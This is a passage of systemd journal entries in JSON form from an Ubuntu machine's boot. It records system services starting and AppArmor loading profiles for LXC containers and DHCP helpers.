"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=200;b=e2b08827b5804427b422c10c84f1567e;m=693d51;t=5bd16dd2cbcb9;x=764810199645f137", "__REALTIME_TIMESTAMP" : "1615280781180089", "__MONOTONIC_TIMESTAMP" : "6896977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "MESSAGE" : "Started Commit a transient machine-id on disk.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781177172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=201;b=e2b08827b5804427b422c10c84f1567e;m=69599e;t=5bd16dd2cd905;x=c708d5829a4ceea3", "__REALTIME_TIMESTAMP" : "1615280781187333", "__MONOTONIC_TIMESTAMP" : "6904222", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "MESSAGE" : "Started Create Volatile Files and Directories.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781184338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=202;b=e2b08827b5804427b422c10c84f1567e;m=6978e6;t=5bd16dd2cf84d;x=1302676ed9c7dd18", "__REALTIME_TIMESTAMP" : "1615280781195341", "__MONOTONIC_TIMESTAMP" : "6912230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Update UTMP about System Boot/Shutdown...", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781192809" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=203;b=e2b08827b5804427b422c10c84f1567e;m=699f7c;t=5bd16dd2d1ee3;x=c7aed6302cee302f", "__REALTIME_TIMESTAMP" : "1615280781205219", "__MONOTONIC_TIMESTAMP" : "6922108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Network Time Synchronization...", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781203129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=204;b=e2b08827b5804427b422c10c84f1567e;m=69f639;t=5bd16dd2d75a0;x=9d78d1321ca2756", "__REALTIME_TIMESTAMP" : "1615280781227424", "__MONOTONIC_TIMESTAMP" : "6944313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "MESSAGE" : "Started Update UTMP about System Boot/Shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781224990" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=205;b=e2b08827b5804427b422c10c84f1567e;m=6a826a;t=5bd16dd2e01d1;x=b54240324bbd03a7", "__REALTIME_TIMESTAMP" : "1615280781263313", "__MONOTONIC_TIMESTAMP" : "6980202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "MESSAGE" : " * Starting AppArmor profiles", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=206;b=e2b08827b5804427b422c10c84f1567e;m=6ae1af;t=5bd16dd2e6116;x=50c94c5dd5eeb412", "__REALTIME_TIMESTAMP" : "1615280781287702", "__MONOTONIC_TIMESTAMP" : "7004591", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "MESSAGE" : "Started ebtables ruleset management.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781284952" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=207;b=e2b08827b5804427b422c10c84f1567e;m=6c3082;t=5bd16dd2fafe9;x=7df85c9a8de74e58", "__REALTIME_TIMESTAMP" : "1615280781373417", "__MONOTONIC_TIMESTAMP" : "7090306", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "MESSAGE" : "Started Network Time Synchronization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781368527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=208;b=e2b08827b5804427b422c10c84f1567e;m=6c30fa;t=5bd16dd2fb061;x=3716d06186f5c01e", "__REALTIME_TIMESTAMP" : "1615280781373537", "__MONOTONIC_TIMESTAMP" : "7090426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target System Time Synchronized.", "UNIT" : "time-sync.target", "INVOCATION_ID" : "f36253b2c17d489dabcad39f82479ebc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781371007" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=209;b=e2b08827b5804427b422c10c84f1567e;m=70e9c0;t=5bd16dd346927;x=90e2c516be7e04e9", "__REALTIME_TIMESTAMP" : "1615280781682983", "__MONOTONIC_TIMESTAMP" : "7399872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781676000", "_AUDIT_TYPE" : "1400", "_AUDIT_ID" : "2", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_AUDIT_FIELD_NAME" : "lxc-container-default", "_PID" : "523", "_COMM" : "apparmor_parser" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20a;b=e2b08827b5804427b422c10c84f1567e;m=70ea9f;t=5bd16dd346a06;x=9c867e315db79cb9", "__REALTIME_TIMESTAMP" : "1615280781683206", "__MONOTONIC_TIMESTAMP" : "7400095", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7399857", "MESSAGE" : "audit: type=1400 audit(1615280781.676:2): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20b;b=e2b08827b5804427b422c10c84f1567e;m=70ecd7;t=5bd16dd346c3f;x=2c21b58f3c40574f", "__REALTIME_TIMESTAMP" : "1615280781683775", "__MONOTONIC_TIMESTAMP" : "7400663", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "3", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-cgns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20c;b=e2b08827b5804427b422c10c84f1567e;m=70f799;t=5bd16dd347700;x=9b608a14e0fbea31", "__REALTIME_TIMESTAMP" : "1615280781686528", "__MONOTONIC_TIMESTAMP" : "7403417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "4", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-mounting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20d;b=e2b08827b5804427b422c10c84f1567e;m=70fa3e;t=5bd16dd3479a5;x=89a99b7b754d8e8b", "__REALTIME_TIMESTAMP" : "1615280781687205", "__MONOTONIC_TIMESTAMP" : "7404094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7400658", "MESSAGE" : "audit: type=1400 audit(1615280781.680:3): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20e;b=e2b08827b5804427b422c10c84f1567e;m=70fa68;t=5bd16dd3479cf;x=a19f71accf09174", "__REALTIME_TIMESTAMP" : "1615280781687247", "__MONOTONIC_TIMESTAMP" : "7404136", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7403411", "MESSAGE" : "audit: type=1400 audit(1615280781.680:4): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20f;b=e2b08827b5804427b422c10c84f1567e;m=70fab6;t=5bd16dd347a1e;x=531b7de5d920da5d", "__REALTIME_TIMESTAMP" : "1615280781687326", "__MONOTONIC_TIMESTAMP" : "7404214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781684000", "_AUDIT_ID" : "5", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-nesting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=210;b=e2b08827b5804427b422c10c84f1567e;m=7109e4;t=5bd16dd34894c;x=1bb336b25c13feeb", "__REALTIME_TIMESTAMP" : "1615280781691212", "__MONOTONIC_TIMESTAMP" : "7408100", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7404210", "MESSAGE" : "audit: type=1400 audit(1615280781.684:5): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=211;b=e2b08827b5804427b422c10c84f1567e;m=740920;t=5bd16dd378887;x=4e977cd2df564d8e", "__REALTIME_TIMESTAMP" : "1615280781887623", "__MONOTONIC_TIMESTAMP" : "7604512", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_AUDIT_ID" : "6", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/sbin/dhclient", "_PID" : "527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=212;b=e2b08827b5804427b422c10c84f1567e;m=740c10;t=5bd16dd378b78;x=392dcb54c67371c2", "__REALTIME_TIMESTAMP" : "1615280781888376", "__MONOTONIC_TIMESTAMP" : "7605264", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "7", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-client.action" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=213;b=e2b08827b5804427b422c10c84f1567e;m=740e5e;t=5bd16dd378dc6;x=9a77ee7cec693e7e", "__REALTIME_TIMESTAMP" : "1615280781888966", "__MONOTONIC_TIMESTAMP" : "7605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "8", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=214;b=e2b08827b5804427b422c10c84f1567e;m=7410ae;t=5bd16dd379015;x=ada4a1831bf5991d", "__REALTIME_TIMESTAMP" : "1615280781889557", "__MONOTONIC_TIMESTAMP" : "7606446", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "9", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/connman/scripts/dhclient-script" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=215;b=e2b08827b5804427b422c10c84f1567e;m=741713;t=5bd16dd37967a;x=201ee3deb2c44ea4", "__REALTIME_TIMESTAMP" : "1615280781891194", "__MONOTONIC_TIMESTAMP" : "7608083", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7604498", "MESSAGE" : "audit: type=1400 audit(1615280781.884:6): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=216;b=e2b08827b5804427b422c10c84f1567e;m=74176c;t=5bd16dd3796d4;x=713739dbd95eae3", "__REALTIME_TIMESTAMP" : "1615280781891284", "__MONOTONIC_TIMESTAMP" : "7608172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605258", "MESSAGE" : "audit: type=1400 audit(1615280781.884:7): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=217;b=e2b08827b5804427b422c10c84f1567e;m=7417b9;t=5bd16dd379720;x=774be3c5b932a4a9", "__REALTIME_TIMESTAMP" : "1615280781891360", "__MONOTONIC_TIMESTAMP" : "7608249", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605849", "MESSAGE" : "audit: type=1400 audit(1615280781.884:8): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=218;b=e2b08827b5804427b422c10c84f1567e;m=7417da;t=5bd16dd379741;x=ca3690b9ca2053ef", "__REALTIME_TIMESTAMP" : "1615280781891393", "__MONOTONIC_TIMESTAMP" : "7608282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7606441", "MESSAGE" : "audit: type=1400 audit(1615280781.884:9): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=219;b=e2b08827b5804427b422c10c84f1567e;m=744f27;t=5bd16dd37ce8f;x=f9560e2a0e92290e", "__REALTIME_TIMESTAMP" : "1615280781905551", "__MONOTONIC_TIMESTAMP" : "7622439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : 